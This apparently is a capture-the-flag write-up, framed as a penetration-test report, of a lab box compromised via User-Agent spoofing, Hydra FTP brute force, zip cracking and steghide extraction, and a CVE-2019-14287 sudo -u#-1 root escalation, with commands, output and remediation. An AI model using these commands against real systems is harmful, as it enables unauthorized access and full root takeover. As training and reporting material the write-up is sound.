User-Agent gate, FTP stego chain, and sudo runas bypass
Apache gated content on User-Agent C (agent chris). Hydra cracked FTP; binwalk/zip2john and steghide recovered james’s SSH password. CVE-2019-14287 sudo -u#-1 bypass yielded root.
- Case files
- User-Agent gate, FTP stego chain, and sudo runas bypass
We bypassed a User-Agent access gate, cracked weak FTP credentials, extracted secrets from stego/zip artifacts, authenticated as james over SSH, and escalated with CVE-2019-14287.
nmap mapped FTP/SSH/HTTP. User-Agent: C redirected to agent_C_attention.php.
Hydra: chris/crystal. FTP held To_agentJ.txt, cute-alien.jpg, cutie.png. binwalk extracted an encrypted zip; john recovered alien. steghide on the JPG used Area51.
SSH with recovered credentials. sudo allowed runas all except root; sudo -u#-1 /bin/bash returned root.
Engagement summary
We bypassed a User-Agent access gate, cracked weak FTP credentials, extracted secrets from stego/zip artifacts, authenticated as james over SSH, and escalated with CVE-2019-14287.
Target 10.10.14.138 exposed FTP, SSH, and Apache. The announcement page redirected agents based on User-Agent. Header C revealed agent chris and a warning about a weak password. Hydra recovered FTP password crystal. Embedded zip and steghide payloads disclosed james / hackerrules!. sudo -l showed a runas configuration vulnerable to CVE-2019-14287 (sudo -u#-1).
Business impact
Security-through-obscurity User-Agent checks are not access control. Weak FTP passwords plus stego-stored credentials and a known sudo bypass completed the path to root.
Recon and User-Agent gated content
nmap mapped FTP/SSH/HTTP. User-Agent: C redirected to agent_C_attention.php.
OPERATOR · NMAP
savvy@lab:~$ sudo nmap 10.10.14.138 -sV -A -sC -Pn
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
OPERATOR · CURL UA
savvy@lab:~$ curl http://10.10.14.138 -H "User-Agent: C" -L
Attention chris, ...
Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From, Agent R
FTP access and stego/zip extraction
Hydra: chris/crystal. FTP held To_agentJ.txt, cute-alien.jpg, cutie.png. binwalk extracted an encrypted zip; john recovered alien. steghide on the JPG used Area51.
OPERATOR · HYDRA FTP
savvy@lab:~$ hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.14.138 -t 40
[21][ftp] host: 10.10.14.138 login: chris password: crystal
OPERATOR · BINWALK + JOHN
savvy@lab:~$ binwalk cutie.png -e
34562 Zip archive data, encrypted … name: To_agentR.txt
savvy@lab:~$ zip2john 8702.zip > hash
savvy@lab:~$ john hash --show
8702.zip/To_agentR.txt:alien:To_agentR.txt:8702.zip
OPERATOR · STEGHIDE
savvy@lab:~$ steghide extract -sf cute-alien.jpg -p Area51
# extracted material disclosed james / hackerrules!
SSH as james and CVE-2019-14287
SSH with recovered credentials. sudo allowed runas all except root; sudo -u#-1 /bin/bash returned root.
OPERATOR · SSH + SUDO
savvy@lab:~$ ssh james@10.10.14.138
password: hackerrules!
savvy@lab:~$ sudo -l
(ALL, !root) /bin/bash
savvy@lab:~$ sudo -u#-1 /bin/bash
root@lab:~#
Remediation
Replace User-Agent gates with real authentication, enforce strong FTP/SSH passwords, do not hide credentials in media files, and patch sudo past CVE-2019-14287 (disallow runas exclusions that the bug bypasses).